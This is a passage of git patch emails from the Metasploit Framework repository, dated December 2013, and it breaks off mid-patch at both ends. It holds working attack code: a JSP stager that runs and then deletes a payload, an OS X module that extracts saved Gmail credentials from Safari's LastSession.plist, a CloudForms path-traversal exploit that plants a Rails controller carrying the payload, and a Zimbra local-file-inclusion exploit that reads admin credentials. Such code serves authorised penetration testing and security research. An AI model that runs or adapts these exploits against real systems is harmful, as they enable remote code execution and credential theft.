Runtime.getRuntime().exec(\"chmod 700 \" + payload);" + stager += " Runtime.getRuntime().exec(\"bash -c '\" + payload + \"'\");" + stager += " Runtime.getRuntime().exec(\"rm \" + jspfile);" + stager += "%>" + return stager + end +end From ea6ba2b159b3817df55d2119d1e345aa34195a7e Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 17 Dec 2013 13:07:30 -0600 Subject: [PATCH 077/205] Add post module to get LastSession.plist LastSession.plist sometimes contains sensitive information such as usernames and passwords. It'd be nice to keep this in loot. --- modules/post/osx/gather/safari_lastsession.rb | 220 ++++++++++++++++++ 1 file changed, 220 insertions(+) create mode 100644 modules/post/osx/gather/safari_lastsession.rb diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb new file mode 100644 index 0000000000..6b82ef376e --- /dev/null +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -0,0 +1,220 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + include Msf::Post::File + include Msf::Auxiliary::Report + + def initialize(info={}) + super( update_info( info, + 'Name' => 'OSX Gather Safari LastSession.plist', + 'Description' => %q{ + This module downloads the LastSession.plist file from the target machine. + LastSession.plist is used by Safari to track active websites in the current + session, and sometimes contains sensitive information such as usernames and + passwords. This module will first download the original LastSession.plist, + and then attempt to find the credential for Gmail. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'sinn3r'], + 'Platform' => [ 'osx' ], + 'SessionTypes' => [ 'shell' ], + 'References' => + [ + ['URL', 'http://www.securelist.com/en/blog/8168/Loophole_in_Safari'] + ] + )) + end + + + # + # Returns the Safari version based on version.plist + # @return [String] The Safari version. If not found, returns '' + # + def get_safari_version + vprint_status("#{peer} - Checking Safari version.") + version = '' + + f = read_file("/Applications/Safari.app/Contents/version.plist") + xml = REXML::Document.new(f) + return version if xml.root.nil? + + xml.elements['plist/dict'].each_element do |e| + if e.text == 'CFBundleShortVersionString' + version = e.next_element.text + break + end + end + + version + end + + def peer + "#{session.session_host}:#{session.session_port}" + end + + + # + # Converts LastSession.plist to xml, and then read it + # @param filename [String] The path to LastSession.plist + # @return [String] Returns the XML version of LastSession.plist + # + def plutil(filename) + cmd_exec("plutil -convert xml1 #{filename}") + cmd_exec("cat #{filename}") + end + + + # + # Returns the XML version of LastSession.plist (text file) + # Just a wrapper for plutil + # + def get_lastsession + print_status("#{peer} - Looking for LastSession.plist") + plutil("~/Library/Safari/LastSession.plist") + end + + + # + # Returns the element that contains session data + # @param lastsession [String] XML data + # @return [REXML::Element] The Array element for the session data + # + def get_sessions(lastsession) + session_dict = nil + + xml = REXML::Document.new(lastsession) + return nil if xml.root.nil? + + xml.elements['plist'].each_element do |e| + found = false + e.elements.each do |e2| + if e2.text == 'SessionWindows' + session_dict = e.elements['array'] + found = true + break + end + end + + break if found + end + + session_dict + end + + + # + # Returns the session element + # @param xml [REXML::Element] The array element for the session data + # @param domain [String] The domain to search for + # @return [REXML::Element] The element for the session data + # + def get_session_element(xml, domain) + dict = nil + + found = false + xml.each_element do |e| + e.elements['array/dict'].each_element do |e2| + if e2.text =~ /#{domain}/ + dict = e + found = true + break + end + end + + break if found + end + + dict + end + + + # + # Extracts Gmail username/password + # @param xml [REXML::Element] The array element for the session data + # @return [Array] [0] is the domain, [1] is the user, [2] is the pass + # + def find_gmail_cred(xml) + vprint_status("#{peer} - Looking for username/password for Gmail.") + gmail_dict = get_session_element(xml, 'mail.google.com') + return '' if gmail_dict.nil? + + raw_data = gmail_dict.elements['array/dict/data'].text + decoded_data = Rex::Text.decode_base64(raw_data) + cred = decoded_data.scan(/Email=(.+)&Passwd=(.+)\&signIn/).flatten + user, pass = cred.map {|data| Rex::Text.uri_decode(data)} + + return '' if user.blank? or pass.blank? + + ['mail.google.com', user, pass] + end + + # + # Runs the module + # + def run + cred_tbl = Rex::Ui::Text::Table.new({ + 'Header' => 'Credentials', + 'Indent' => 1, + 'Columns' => ['Domain', 'Username', 'Password'] + }) + + # + # Downloads LastSession.plist in XML format + # + lastsession = get_lastsession + if lastsession.blank? + print_error("#{peer} - LastSession.plist not found") + return + else + p = store_loot('osx.lastsession.plist', 'text/plain', session, lastsession, 'LastSession.plist.xml') + print_good("#{peer} - LastSession.plist stored in: #{p.to_s}") + end + + # + # If this is an unpatched version, we try to extract creds + # + version = get_safari_version + if version.blank? + print_warning("Unable to determine Safari version, will try to extract creds anyway") + elsif version >= "6.1" + print_status("#{peer} - This machine no longer stores session data in plain text") + return + else + vprint_status("#{peer} - Safari version: #{version}") + end + + # + # Attempts to convert the XML file to an actual XML object, with the element + # holding our session data + # + lastsession_xml = get_sessions(lastsession) + unless lastsession_xml + print_error("Cannot read XML file, or unable to find any session data") + return + end + + # + # Look for credential in the session data. + # I don't know who else stores their user/pass in the session data, but I accept pull requests. + # Already looked at hotmail, yahoo, and twitter + # + gmail_cred = find_gmail_cred(lastsession_xml) + cred_tbl << gmail_cred unless gmail_cred.blank? + + unless cred_tbl.rows.empty? + p = store_loot('osx.lastsession.creds', 'text/plain', session, cred_tbl.to_csv, 'LastSession_creds.txt') + print_good("#{peer} - Found credential saved in: #{p}") + print_line + print_line(cred_tbl.to_s) + end + end + +end From 80eea97ccd6b148b246e71e46b9025d11c17917b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 17 Dec 2013 13:31:56 -0600 Subject: [PATCH 078/205] ChrisJohnRiley fix for sap_service_discovery --- .../scanner/sap/sap_service_discovery.rb | 40 +++++++++++-------- 1 file changed, 23 insertions(+), 17 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_service_discovery.rb b/modules/auxiliary/scanner/sap/sap_service_discovery.rb index 713ce9aec0..1d64e481e2 100644 --- a/modules/auxiliary/scanner/sap/sap_service_discovery.rb +++ b/modules/auxiliary/scanner/sap/sap_service_discovery.rb @@ -47,15 +47,20 @@ class Metasploit4 < Msf::Auxiliary def_ports = [ '32NN', '33NN', '48NN', '80NN', '36NN', '81NN', '5NN00', '5NN01', '5NN02', '5NN03', '5NN04', '5NN05', '5NN06', '5NN07', '5NN08', '5NN10', '5NN16', - '5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '21212', '21213', '59975', - '59976', '4238', '4239','4240', '4241', '3299', '3298', '515', '7200', - '7210', '7269', '7270', '7575', '5NN15', '39NN', '3909', '4NN00', '8200', - '8210', '8220', '8230', '4363', '4444', '4445', '9999', '3NN01', '3NN02', - '3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08', '3NN11', '3NN17', - '20003', '20004', '20005', '20006', '20007', '31596', '31597', '31602', - '31601', '31604', '2000', '2001', '2002', '8355', '8357', '8351' ,'8352', - '8353', '8366', '1090', '1095', '20201', '1099', '1089' + '5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '5NN15', '39NN', '4NN00', + '3NN01', '3NN02', '3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08', + '3NN11', '3NN17' ] + + static_ports = [ + '21212', '21213', '59975', '59976', '4238', '4239','4240', '4241', '3299', + '3298', '515', '7200', '7210', '7269', '7270', '7575', '3909', '8200', + '8210', '8220', '8230', '4363', '4444', '4445', '9999', '20003', '20004', + '20005', '20006', '20007', '31596', '31597', '31602', '31601', '31604', + '2000', '2001', '2002', '8355', '8357', '8351' ,'8352', '8353', '8366', + '1090', '1095', '20201', '1099', '1089' + ] + ports = [] # Build ports array from valid instance numbers @@ -94,7 +99,7 @@ class Metasploit4 < Msf::Auxiliary final_ports << dport.gsub("NN", inst) end end - + final_ports.push(*static_ports) ports = final_ports if ports.empty? @@ -222,14 +227,15 @@ class Metasploit4 < Msf::Auxiliary end print_good("#{ip}:#{port}\t - #{service} OPEN") -=begin - report_note(:host => "#{ip}", - :proto => 'TCP', - :port => "#{port}", - :type => 'SAP', - :data => "#{service}") -=end - + begin + report_note( + :host => "#{ip}", + :proto => 'TCP', + :port => "#{port}", + :type => 'SAP', + :data => "#{service}" + ) + end r << [ip,port,"open", service] rescue ::Rex::ConnectionRefused vprint_status("#{ip}:#{port}\t - TCP closed") From 374ef71c12214a65ca7216cd3c7727157efd4e33 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 17 Dec 2013 15:34:52 -0600 Subject: [PATCH 079/205] Favor read_file instead --- modules/post/osx/gather/safari_lastsession.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index 6b82ef376e..c5f07339be 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post # def plutil(filename) cmd_exec("plutil -convert xml1 #{filename}") - cmd_exec("cat #{filename}") + read_file(filename) end From 7ec96876d92244f5983025be9a2f57d6142f195d Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 17 Dec 2013 15:57:09 -0600 Subject: [PATCH 080/205] Delete unnecessary includes --- modules/post/osx/gather/safari_lastsession.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index c5f07339be..d08537550d 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -8,9 +8,7 @@ require 'rexml/document' class Metasploit3 < Msf::Post - include Msf::Post::Common include Msf::Post::File - include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, From 21feae0bbc3c556a96735e86aca1611aec96b1f0 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 17 Dec 2013 16:38:58 -0600 Subject: [PATCH 081/205] Make sure the file path is readable when it's ~/ --- modules/post/osx/gather/safari_lastsession.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index d08537550d..5e88f44a0c 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post version = '' f = read_file("/Applications/Safari.app/Contents/version.plist") - xml = REXML::Document.new(f) + xml = REXML::Document.new(f) rescue nil return version if xml.root.nil? xml.elements['plist/dict'].each_element do |e| @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Post # def plutil(filename) cmd_exec("plutil -convert xml1 #{filename}") - read_file(filename) + cmd_exec("cat #{filename}") end @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Post def get_sessions(lastsession) session_dict = nil - xml = REXML::Document.new(lastsession) + xml = REXML::Document.new(lastsession) rescue nil return nil if xml.root.nil? xml.elements['plist'].each_element do |e| From 10e16673a7193adb20049e4984292bd1c19420c4 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 17 Dec 2013 16:42:49 -0600 Subject: [PATCH 082/205] There must be read_file --- modules/post/osx/gather/safari_lastsession.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb index 5e88f44a0c..a254207d37 100644 --- a/modules/post/osx/gather/safari_lastsession.rb +++ b/modules/post/osx/gather/safari_lastsession.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Post f = read_file("/Applications/Safari.app/Contents/version.plist") xml = REXML::Document.new(f) rescue nil - return version if xml.root.nil? + return version if xml.nil? xml.elements['plist/dict'].each_element do |e| if e.text == 'CFBundleShortVersionString' @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Post # def plutil(filename) cmd_exec("plutil -convert xml1 #{filename}") - cmd_exec("cat #{filename}") + read_file(filename) end @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Post # def get_lastsession print_status("#{peer} - Looking for LastSession.plist") - plutil("~/Library/Safari/LastSession.plist") + plutil("#{expand_path("~")}/Library/Safari/LastSession.plist") end @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Post session_dict = nil xml = REXML::Document.new(lastsession) rescue nil - return nil if xml.root.nil? + return nil if xml.nil? xml.elements['plist'].each_element do |e| found = false From 5e4c395f8663517696787749732050c4fb521641 Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 18 Dec 2013 17:14:47 +1000 Subject: [PATCH 083/205] Fix small spacing issue --- modules/auxiliary/gather/dns_cache_scraper.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index a59d692391..bc3294ce3a 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -12,12 +12,12 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'DNS Non-Recursive Record Scraper', - 'Description' => %q{ + 'Description' => %q{ This module can be used to scrape records that have been cached by a specific nameserver. The module allows the user to test every record from a specified file. }, - 'Author'=> [ + 'Author' => [ 'Brandon McCann "zeknox" ', 'Rob Dixon "304geek" ' ], From a28ea187989767146be582adc56712e1dbe49e05 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 18 Dec 2013 11:32:34 -0600 Subject: [PATCH 084/205] Clean pull request --- .../http/cfme_manageiq_evm_upload_exec.rb | 78 +++++++++++-------- 1 file changed, 45 insertions(+), 33 deletions(-) mode change 100755 => 100644 modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb diff --git a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb old mode 100755 new mode 100644 index 16eb3081ac..d1c1a434ca --- a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb +++ b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb @@ -1,8 +1,6 @@ ## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' @@ -15,10 +13,10 @@ class Metasploit4 < Msf::Exploit::Remote super( 'Name' => 'Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal', 'Description' => %q{ - This module exploits a path traversal vulnerability in the "linuxpkgs" + This module exploits a path traversal vulnerability in the "linuxpkgs" action of "agent" controller of the Red Hat CloudForms Management Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier). - It uploads a fake controller to the controllers directory of the Rails + It uploads a fake controller to the controllers directory of the Rails application with the encoded payload as an action and sends a request to this action to execute the payload. Optionally, it can also upload a routing file containing a route to the action. (Which is not necessary, since the @@ -40,33 +38,52 @@ class Metasploit4 < Msf::Exploit::Remote ['Automatic', {}] ], 'DisclosureDate' => 'Sep 4 2013', - 'DefaultOptions' => { 'PrependFork' => true }, + 'DefaultOptions' => + { + 'PrependFork' => true, + 'SSL' => true + }, 'DefaultTarget' => 0 ) register_options( [ Opt::RPORT(443), - OptBool.new('SSL', [true, 'Use SSL', true]), - OptBool.new('ROUTES', [true, 'Upload a routing file', false]), OptString.new('CONTROLLER', [false, 'The name of the controller']), OptString.new('ACTION', [false, 'The name of the action']), OptString.new('TARGETURI', [ true, 'The path to the application', '/']), OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ]) ], self.class ) + + register_advanced_options( + [ + OptBool.new('ROUTES', [true, 'Upload a routing file. Warning: It is not necessary by default and can damage the target application', false]), + ], self.class) + end + + def check + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "ping.html") + ) + + if res and res.code == 200 and res.body.to_s =~ /EVM ping response/ + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Unknown end def exploit controller = - if datastore['CONTROLLER'].nil? || datastore['CONTROLLER'].empty? + if datastore['CONTROLLER'].blank? Rex::Text.rand_text_alpha_lower(rand(9) + 3) else datastore['CONTROLLER'].downcase end action = - if datastore['ACTION'].nil? || datastore['ACTION'].empty? + if datastore['ACTION'].blank? Rex::Text.rand_text_alpha_lower(rand(9) + 3) else datastore['ACTION'].downcase @@ -75,33 +92,16 @@ class Metasploit4 < Msf::Exploit::Remote data = "class #{controller.capitalize}Controller < ApplicationController; def #{action}; #{payload.encoded}; render :nothing => true; end; end\n" print_status("Sending fake-controller upload request to #{target_url('agent', 'linuxpkgs')}...") - res = send_request_cgi( - 'method' => datastore['HTTP_METHOD'], - 'uri' => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'), - "vars_#{datastore['HTTP_METHOD'].downcase}" => { - 'data' => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)), - 'filename' => "../../app/controllers/#{controller}_controller.rb", - 'md5' => Rex::Text.md5(data) - } - ) + res = upload_file("../../app/controllers/#{controller}_controller.rb", data) - fail_with(Failure::Unknown, 'No response from remote host') if res.nil? + fail_with(Failure::Unknown, 'No response from remote host') unless res and res.code == 500 if datastore['ROUTES'] data = "Vmdb::Application.routes.draw { root :to => 'dashboard#login'; match ':controller(/:action(/:id))(.:format)' }\n" print_status("Sending routing-file upload request to #{target_url('agent', 'linuxpkgs')}...") - res = send_request_cgi( - 'method' => datastore['HTTP_METHOD'], - 'uri' => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'), - "vars_#{datastore['HTTP_METHOD'].downcase}" => { - 'data' => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)), - 'filename' => '../../config/routes.rb', - 'md5' => Rex::Text.md5(data) - } - ) - - fail_with(Failure::Unknown, 'No response from remote host') if res.nil? + res = upload_file("../../config/routes.rb", data) + fail_with(Failure::Unknown, 'No response from remote host') unless res and res.code == 500 end print_status("Sending execute request to #{target_url(controller, action)}...") @@ -109,8 +109,20 @@ class Metasploit4 < Msf::Exploit::Remote 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, controller, action) ) + end - handler + def upload_file(filename, data) + res = send_request_cgi( + 'method' => datastore['HTTP_METHOD'], + 'uri' => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'), + "vars_#{datastore['HTTP_METHOD'].downcase}" => { + 'data' => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)), + 'filename' => filename, + 'md5' => Rex::Text.md5(data) + } + ) + + return res end def target_url(*args) From ef081cec49ecf42609b6a2a771fbd1025d990139 Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Wed, 18 Dec 2013 15:47:23 -0200 Subject: [PATCH 085/205] Add missing disclosure date as per review --- modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb index ea06de592b..86ff29d4bc 100755 --- a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb +++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb @@ -28,7 +28,7 @@ class Metasploit4 < Msf::Auxiliary ['CWE', '89'], ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=959062'] ], - 'DisclosureDate' => '' + 'DisclosureDate' => 'Nov 12 2013' ) register_options( From ec64382efc6ddfb962e775cf915bd17b7227269b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 18 Dec 2013 11:53:30 -0600 Subject: [PATCH 086/205] Fix cfme_manageiq_evm_upload_exec according to chat with @rcvalle --- .../http/cfme_manageiq_evm_upload_exec.rb | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb index d1c1a434ca..270fe2af3d 100644 --- a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb +++ b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb @@ -8,6 +8,7 @@ require 'msf/core' class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper def initialize super( @@ -93,15 +94,27 @@ class Metasploit4 < Msf::Exploit::Remote print_status("Sending fake-controller upload request to #{target_url('agent', 'linuxpkgs')}...") res = upload_file("../../app/controllers/#{controller}_controller.rb", data) - - fail_with(Failure::Unknown, 'No response from remote host') unless res and res.code == 500 + fail_with(Failure::Unknown, 'No response from remote host') if res.nil? + register_files_for_cleanup("app/controllers/#{controller}_controller.rb") + # According to rcvalle, all the version have not been checked + # so we're not sure if res.code will be always 500, in order + # to not lose sessions, just print warning and proceeding + unless res and res.code == 500 + print_warning("Unexpected reply but proceeding anyway...") + end if datastore['ROUTES'] data = "Vmdb::Application.routes.draw { root :to => 'dashboard#login'; match ':controller(/:action(/:id))(.:format)' }\n" print_status("Sending routing-file upload request to #{target_url('agent', 'linuxpkgs')}...") res = upload_file("../../config/routes.rb", data) - fail_with(Failure::Unknown, 'No response from remote host') unless res and res.code == 500 + fail_with(Failure::Unknown, 'No response from remote host') if res.nil? + # According to rcvalle, all the version have not been checked + # so we're not sure if res.code will be always 500, in order + # to not lose sessions, just print warning and proceeding + unless res and res.code == 500 + print_warning("Unexpected reply but proceeding anyway...") + end end print_status("Sending execute request to #{target_url(controller, action)}...") From e20569181b94c357b961a2faad441f5c7c1e574d Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Wed, 18 Dec 2013 15:51:30 -0200 Subject: [PATCH 087/205] Remove EzCrypto-related code as per review --- .../http/cfme_manageiq_evm_pass_reset.rb | 24 ++++++------------- 1 file changed, 7 insertions(+), 17 deletions(-) diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb index 86ff29d4bc..8b59b4315f 100755 --- a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb +++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb @@ -6,6 +6,8 @@ ## require 'msf/core' +require 'digest' +require 'openssl' class Metasploit4 < Msf::Auxiliary @@ -66,23 +68,11 @@ class Metasploit4 < Msf::Auxiliary else password = '1234567890123456' salt = '6543210987654321' - - begin - require 'ezcrypto' - - key = EzCrypto::Key.with_password(password, salt, :algorithm => 'AES-256-CBC') - "v1:{#{key.encrypt64(datastore['TARGETPASSWORD']).strip}}" - - rescue LoadError - require 'digest' - require 'openssl' - - cipher = OpenSSL::Cipher.new('AES-256-CBC') - cipher.encrypt - cipher.key = Digest::SHA256.digest("#{salt}#{password}")[0...32] - encrypted = cipher.update(datastore['TARGETPASSWORD']) + cipher.final - "v1:{#{Rex::Text.encode_base64(encrypted)}}" - end + cipher = OpenSSL::Cipher.new('AES-256-CBC') + cipher.encrypt + cipher.key = Digest::SHA256.digest("#{salt}#{password}")[0...32] + encrypted = cipher.update(datastore['TARGETPASSWORD']) + cipher.final + "v1:{#{Rex::Text.encode_base64(encrypted)}}" end end From d4a86902a664e0a49569cdd703ff50fdc191a22b Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Wed, 18 Dec 2013 16:01:11 -0200 Subject: [PATCH 088/205] Add the bcrypt gem The bcrypt gem is needed for some admin modules (i.e., cfme_manageiq_evm_pass_reset.rb). For more information, see https://github.com/rapid7/metasploit-framework/pull/2744. --- Gemfile | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Gemfile b/Gemfile index 26b450c436..ef8a2ba1d4 100755 --- a/Gemfile +++ b/Gemfile @@ -2,6 +2,8 @@ source 'https://rubygems.org' # Need 3+ for ActiveSupport::Concern gem 'activesupport', '>= 3.0.0' +# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb) +gem 'bcrypt' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Needed by msfgui and other rpc components From b9a9b90088b6630e37e922fa231a19188c365397 Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Wed, 18 Dec 2013 16:05:32 -0200 Subject: [PATCH 089/205] Update module to use added bcrypt gem --- .../admin/http/cfme_manageiq_evm_pass_reset.rb | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb index 8b59b4315f..66dbf57b87 100755 --- a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb +++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb @@ -6,6 +6,7 @@ ## require 'msf/core' +require 'bcrypt' require 'digest' require 'openssl' @@ -49,16 +50,7 @@ class Metasploit4 < Msf::Auxiliary def password_for_newer_schema # Newer versions use ActiveModel's SecurePassword. - begin - require 'bcrypt' - - BCrypt::Password.create(datastore['TARGETPASSWORD']) - - rescue LoadError - print_error('Can\'t load "bcrypt" gem') - print_status('Using "smartvm" as the password of the target account for this request...') - '$2a$10$OHgj8h5MtsbmIAC9RPsrK.PH9t6Y.qGZxjHxUToKUJtFLJ0eY42/u' - end + BCrypt::Password.create(datastore['TARGETPASSWORD']) end def password_for_older_schema From 166e2ec224fa4222363be553acc92c519b87c3aa Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Wed, 18 Dec 2013 16:51:57 -0200 Subject: [PATCH 090/205] Fix bcrypt gem name --- Gemfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile b/Gemfile index ef8a2ba1d4..26e020ce88 100755 --- a/Gemfile +++ b/Gemfile @@ -3,7 +3,7 @@ source 'https://rubygems.org' # Need 3+ for ActiveSupport::Concern gem 'activesupport', '>= 3.0.0' # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb) -gem 'bcrypt' +gem 'bcrypt-ruby' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Needed by msfgui and other rpc components From 0c0e8c3a49fc4d614eed7b175943797f83ed11e2 Mon Sep 17 00:00:00 2001 From: Mekanismen Date: Wed, 18 Dec 2013 20:54:35 +0100 Subject: [PATCH 091/205] various updates --- modules/exploits/unix/webapp/zimbra_lfi.rb | 78 ++++++++++++++++++---- 1 file changed, 64 insertions(+), 14 deletions(-) diff --git a/modules/exploits/unix/webapp/zimbra_lfi.rb b/modules/exploits/unix/webapp/zimbra_lfi.rb index 26733431ac..6d4e2dcc65 100644 --- a/modules/exploits/unix/webapp/zimbra_lfi.rb +++ b/modules/exploits/unix/webapp/zimbra_lfi.rb @@ -4,13 +4,13 @@ ## require 'msf/core' -require 'uri' - +require 'rexml/document' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE + include REXML Rank = GreatRanking @@ -46,6 +46,10 @@ class Metasploit3 < Msf::Exploit::Remote } ], ], + 'DefaultOptions' => + { + 'SSL' => true + }, 'DefaultTarget' => 0, 'DisclosureDate' => "Dec 06 2013" )) @@ -56,18 +60,21 @@ class Metasploit3 < Msf::Exploit::Remote register_advanced_options( [ - OptBool.new('SSL', [ true, 'Negotiate SSL for outgoing connections', true]), OptString.new('ALTDIR', [ false, 'Alternative zimbraAdmin directory', "zimbraAdmin"]) ]) end def check uri = target_uri.path - turl = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00" - #doesnt want to play nice if used with vars_get + res = send_request_cgi({ - 'uri' => normalize_uri(uri, datastore['ALTDIR'], turl), + 'uri' => normalize_uri(uri, datastore['ALTDIR'], "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz"), 'method' => 'GET', + 'encode_params' => false, + 'vars_get' => { + 'v' => "091214175450", + 'skin' => "../../../../../../../../../opt/zimbra/conf/localconfig.xml%00" + } }) unless res and res.code == 200 @@ -90,11 +97,15 @@ class Metasploit3 < Msf::Exploit::Remote def exploit uri = target_uri.path - turl = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00" - #doesnt want to play nice if used with vars_get + res = send_request_cgi({ - 'uri' => normalize_uri(uri, datastore['ALTDIR'], turl), - 'method' => 'GET' + 'uri' => normalize_uri(uri, datastore['ALTDIR'], "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz"), + 'method' => 'GET', + 'encode_params' => false, + 'vars_get' => { + 'v' => "091214175450", + 'skin' => "../../../../../../../../../opt/zimbra/conf/localconfig.xml%00" + } }) unless res and res.code == 200 @@ -124,9 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote print_good("#{peer} - Got login credentials!") print_status("#{peer} - Getting auth token...") - soap_req = "" - soap_req << "" - soap_req << "#{zimbra_user}#{zimbra_pass}" + soap_req = build_soap_req(zimbra_user, zimbra_pass) #lets get our hands foamy res = send_request_cgi({ 'uri' => normalize_uri(uri, "/service/admin/soap"), @@ -140,6 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res and res.code == 200 + print_status res.body fail_with(Failure::Unknown, "#{peer} - Unable to access service URL") end @@ -165,7 +175,6 @@ class Metasploit3 < Msf::Exploit::Remote dpayload = 